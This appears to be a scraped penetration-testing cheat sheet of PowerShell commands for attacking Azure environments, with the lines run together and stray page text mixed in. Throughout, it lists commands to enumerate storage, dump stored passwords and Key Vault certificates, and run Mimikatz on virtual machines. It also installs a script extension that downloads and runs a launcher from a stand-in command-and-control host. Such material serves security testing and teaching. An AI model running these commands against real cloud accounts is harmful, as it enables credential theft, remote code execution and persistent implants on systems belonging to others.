Invoke-EnumerateAzureSubDomains -Base CLIENT -VerboseInvoke-EnumerateAzureBlobs -Base CLIENT -BingAPIKey 00000000001234567899876543210123Connect-AzAccountGet-AzPasswords -VerboseGet-AzurePasswords -Keys N -AppServices N -Verbose
# Then execute the ps file:
AuthenticateAs-XXXXX.ps1Last updated
Get-AzureKeyVaults-Automation -ExportCerts Y -Subscription "SUBSCRIPTION_NAME" -Verbose | ft -AutoSizeGet-AzVM | Format-Table -Wrap -AutoSize -Property ResourceGroupName,Name,Location
Get-AzureRmVM -status | where {$_.PowerState -EQ "VM running"} | select ResourceGroupName,NameGet-AzureVMExtensionSettings
Get-AzureVMExtensionSettings | Export-CSV -Path C:\tmp\results.csvInvoke-AzureRmVMRunCommand -ResourceGroupName VMResourceGroupName -VMName VMName -CommandId RunPowerShellScript -ScriptPath PathToYourScript
# mimikatz?
Invoke-AzureRmVMRunCommand -ResourceGroupName TESTRESOURCES -VMName Remote-Test -CommandId RunPowerShellScript -ScriptPath Mimikatz.ps1
# Script extension (gather info from Get-AzureVMExtensionSettings):
Set-AzVMCustomScriptExtension -ResourceGroupName TESTER -VMName CSETest -Location westcentralus -FileUri 'https://c2.netspi.invalid/netspi/launcher.ps1' -Run 'launcher.ps1' -Name CovenantScriptExtension
# Cleanup
Remove-AzVMCustomScriptExtension -ResourceGroupName TESTER -VMName MGITest -Name CovenantScriptExtension$uri = "https://s15events.azure-automation.net/webhooks?token=h6[REDACTED]%3d" $AccountInfo = @(@{RequestBody=@{Username="BlogDemoUser";Password="Password123"}}) $body = ConvertTo-Json -InputObject $AccountInfo $response = Invoke-WebRequest -Method Post -Uri $uri -Body $body